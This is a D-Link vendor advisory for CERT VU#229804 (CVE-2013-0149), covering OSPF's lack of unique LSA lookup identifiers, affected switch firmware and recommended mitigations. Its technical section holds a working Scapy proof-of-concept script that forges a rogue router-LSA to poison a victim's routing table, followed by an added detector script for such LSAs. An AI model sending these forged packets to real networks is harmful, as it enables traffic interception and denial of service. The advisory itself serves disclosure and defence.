D-Link Systems, Inc. Information for VU#229804

Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers

Status

Affected

Vendor Statement

1. Advisory Information

    Title: Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers
    D-Link ID: DLINK-2013-VUL0213
    Advisory URL: TBD prior to Aug. 1, 2013
    Date published: August 1, 2013
    Date of last update: 7/29/13 (will update on saving document)
    Reported by: CERT
    Release mode: Coordinated Release

    2. Vulnerability Information
    Class: CWE-694
    Impact: Critical
    Remotely Exploitable: Possible, but would require access via other product(s)
    Locally Exploitable: Yes
    CVE Name: CVE-2013-0149
    3. Vulnerability Description
    The Open Shortest Path First (OSPF) protocol does not specify unique Link State
    Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or
    conduct a Denial of Service (DoS) attack.

    This vulnerability can allow an attacker to re-route traffic through their own router,
    compromising the confidentiality of the data, or to conduct a Denial of Service attack
    against a router, dropping all traffic.

    4. Vulnerable Packages
    The following is the list of known affected devices and the associated firmware
    (confirmed by D-Link). This will be updated as needed if additional units are affected.
    1. DES-3810-28 – R2.20.B017 (HW not available in the US)

    5. Vendor Information, Solutions and Workarounds
    D-Link distributes a number of devices which could potentially be affected by this
    vulnerability; chiefly, any L3 managed switch that supports OSPF has the possibility of
    being subject to this attack.

    D-Link is working to reduce the potential impact of this vulnerability, which is a result of
    an ambiguous standard. Currently we advise the following:

    As always, adhering to best practices will be the strongest defense against attacks. As
    long as your physical devices, networks, and protocols are secured, it will be very
    difficult for an attacker to insert a rogue LSA to initiate this type of attack.

    First, this vulnerability does not defeat cryptographic (MD5) authentication, so we
    recommend a strong MD5 authentication key as your best defense.
    We also recommend that administrators enable the OSPF passive interface feature to
    stop sending or receiving routing table updates on interfaces that do not participate in
    OSPF.

    Finally, we recommend that networks use MAC-based Access Control (MAC) to
    authenticate devices before they are able to communicate with the network. The MAC
    feature is a client-less design so there is no need to install extra software on a user’s
    computer, and ensures that only devices on a whitelist will have access to the network.
    When used in conjunction with common security best practices, it can help to strongly
    limit the possible vectors of attack.

    D-Link is monitoring the situation for an update to the standard that can be implemented
    to protect potentially affected devices.

    6. Credits
    Dr. Gabi Nakibly - NEWRSC, Rafael - Advanced Defense Systems Ltd.
    Eitan Menahem - Telekom Innovation Laboratories, Ben Gurion University
    Ariel Waizel - Telekom Innovation Laboratories, Ben Gurion University
    Prof. Yuval Elovici - Telekom Innovation Laboratories, Ben Gurion University
    The publication of this advisory was not coordinated with the aforementioned

    7. Technical Description / Proof of Concept Code

    7.1. OSPF "Fight Back" is triggered only by LSAs whose Advertising Router matches the
    receiving router's own Router ID, and so can be evaded by using a non-matching Router ID
    and Link State ID on a rogue LSA. Routing lookup uses only the Link State ID field, and so
    may, depending on the implementation, select the rogue LSA before the valid LSA.

    Scapy proof-of-concept attack script (the OSPF layers come from Scapy's ospf contrib
    module; the original listing omitted the imports and used the Python 2 long literal
    0x80000004L for the sequence number):

    from scapy.all import IP, send
    from scapy.contrib.ospf import OSPF_Hdr, OSPF_LSUpd, OSPF_Router_LSA, OSPF_Link

    attacker_source_ip = "192.168.13.1"
    attacker_router_id = "192.168.18.1"
    victim_destination_ip = "192.168.13.3"
    victim_router_id = "192.168.37.3"
    false_adv_router = "192.168.27.11"
    seq_num = 0x80000004
    # Link State ID carries the victim's Router ID while Advertising Router carries a
    # different (false) value, which is the mismatch described in 7.1.
    R3_FALSE_LSA = IP(src=attacker_source_ip, dst=victim_destination_ip) \
        / OSPF_Hdr(src=attacker_router_id) \
        / OSPF_LSUpd(lsalist=[
            OSPF_Router_LSA(options=0x22, type=1, id=victim_router_id, adrouter=false_adv_router,
                            seq=seq_num, linklist=[
                OSPF_Link(id="192.168.37.7", data="192.168.37.3", type=2, metric=1),
                OSPF_Link(id="192.168.13.3", data="192.168.13.3", type=2, metric=1),
                OSPF_Link(id="192.168.50.0", data="255.255.255.0", type=3, metric=3)
            ])
        ])
    send(R3_FALSE_LSA, iface="eth0")
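The defender-side counterpart of 7.1 is to look for the field mismatch the rogue LSA relies on. RFC 2328 sets both the Link State ID and the Advertising Router of a router-LSA (LS type 1) to the originating router's Router ID, so a router-LSA where the two differ is the signature of this attack and can be flagged in a capture or a routing daemon's LSDB dump. The following is an added example written for this page, not D-Link's code or part of the advisory: it parses the LSA headers of an OSPFv2 Link State Update body (the bytes after the 24-byte OSPF header) with the standard library only and reports mismatched router-LSAs. The sample update is constructed inline and reuses the Router ID and false Advertising Router values from the proof of concept; the function and variable names are the example's own.

```python
import struct
from ipaddress import IPv4Address

# OSPFv2 constants from RFC 2328: the LSA header is 20 bytes; LS type 1 is a router-LSA.
ROUTER_LSA = 1
LSA_HDR_LEN = 20
# age, options, type, Link State ID, Advertising Router, sequence, checksum, length
LSA_HDR_FMT = "!HBB4s4sIHH"


def build_lsa_header(ls_type, link_state_id, adv_router, seq, options=0x22, length=LSA_HDR_LEN):
    """Pack a constructed 20-byte LSA header (checksum left zero; sample data only)."""
    return struct.pack(LSA_HDR_FMT, 1, options, ls_type,
                       IPv4Address(link_state_id).packed, IPv4Address(adv_router).packed,
                       seq, 0, length)


def build_ls_update(lsas):
    """Constructed LS Update body: 4-byte LSA count followed by the LSAs themselves."""
    return struct.pack("!I", len(lsas)) + b"".join(lsas)


def parse_lsa_header(buf):
    """Decode one LSA header into a dict; raises ValueError on a truncated buffer."""
    if len(buf) < LSA_HDR_LEN:
        raise ValueError("truncated LSA header")
    age, options, ls_type, lsid, adv, seq, csum, length = struct.unpack(
        LSA_HDR_FMT, buf[:LSA_HDR_LEN])
    return {
        "age": age, "options": options, "type": ls_type,
        "link_state_id": str(IPv4Address(lsid)), "adv_router": str(IPv4Address(adv)),
        "seq": seq, "checksum": csum, "length": length,
    }


def iter_lsa_headers(ls_update_body):
    """Walk an LS Update body and yield each LSA header.

    The header's length field covers header plus body, so it is used to step to
    the next LSA; an inconsistent length is rejected rather than read past the end.
    """
    (count,) = struct.unpack("!I", ls_update_body[:4])
    offset = 4
    for _ in range(count):
        hdr = parse_lsa_header(ls_update_body[offset:])
        if hdr["length"] < LSA_HDR_LEN or offset + hdr["length"] > len(ls_update_body):
            raise ValueError("LSA length field inconsistent with packet size")
        yield hdr
        offset += hdr["length"]


def find_mismatched_router_lsas(lsa_headers):
    """Return router-LSAs whose Link State ID differs from the Advertising Router.

    For type-1 LSAs both fields must equal the originator's Router ID, so a mismatch
    is exactly the rogue LSA of 7.1: the victim's Router ID as Link State ID with
    another value as Advertising Router, which keeps fight back from triggering.
    """
    return [h for h in lsa_headers
            if h["type"] == ROUTER_LSA and h["link_state_id"] != h["adv_router"]]


# Constructed sample: a legitimate router-LSA from 192.168.37.3 followed by a rogue
# one that reuses that Router ID as Link State ID but advertises 192.168.27.11.
# The sample LSAs are header-only (length 20), which is enough for the check.
SAMPLE_LS_UPDATE = build_ls_update([
    build_lsa_header(ROUTER_LSA, "192.168.37.3", "192.168.37.3", 0x80000003),
    build_lsa_header(ROUTER_LSA, "192.168.37.3", "192.168.27.11", 0x80000004),
])


def audit(ls_update_body=SAMPLE_LS_UPDATE):
    """Return (number of LSAs parsed, list of suspicious router-LSA headers)."""
    headers = list(iter_lsa_headers(ls_update_body))
    return len(headers), find_mismatched_router_lsas(headers)


if __name__ == "__main__":
    total, suspicious = audit()
    print(f"{total} LSAs parsed, {len(suspicious)} suspicious")
    for h in suspicious:
        print(f"  router-LSA id={h['link_state_id']} adv_router={h['adv_router']} "
              f"seq={h['seq']:#x}")
```

On real traffic, feed `iter_lsa_headers` the payload that follows the OSPF header of type-4 (Link State Update) packets, or run `find_mismatched_router_lsas` over an LSDB export; with MD5 authentication enabled as recommended in section 5, any such LSA that still appears points at a host that holds the key.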

    8. Report Timeline
    • May 28, 2013 – Notification by CERT of the issue
    • May 28, 2013 – Notify qualified D-Link resources of issue
    • June 6, 2013 – CERT notified embargo date changed to July 30
    • June 6, 2013 – D-Link requests CERT to resend details
    • June 11, 2013 – D-Link receives details
    • July 29, 2013 – CERT notified embargo date changed to Aug 1
    • July 29, 2013 – D-Link sends Vulnerability Response Report to CERT
    • July 30, 2013 – D-Link posts report for affected products

    9. References
    [1] CVE-229804-2013.pdf – Owning the Routing Table Part II

    10. About D-Link
    D-Link is the global leader in connectivity for home, small business, mid- to large-sized enterprise
    environments, and service providers. An award-winning designer, developer, and manufacturer, D-Link
    implements and supports unified network solutions that integrate capabilities in switching, wireless,
    broadband, storage, IP Surveillance, and cloud-based network management. For more information visit
    www.dlink.com, or connect with D-Link on Facebook (www.facebook.com/dlink) and Twitter
    (www.twitter.com/dlink).

    11. Disclaimer
    D-Link and the D-Link logo are trademarks or registered trademarks of D-Link Corporation or its
    subsidiaries. All other third-party marks mentioned herein may be trademarks of their respective owners.
    Copyright 2013. D-Link. All Rights Reserved.

    References

    Authors:
    Patrick Cline - Patrick.Cline@dlink.com
    William Brown – William.Brown@dlink.com

    Vendor Information

    Please see DLINK-2013-VUL0213.

    Vendor References

    None

    Addendum

    There are no additional comments at this time.
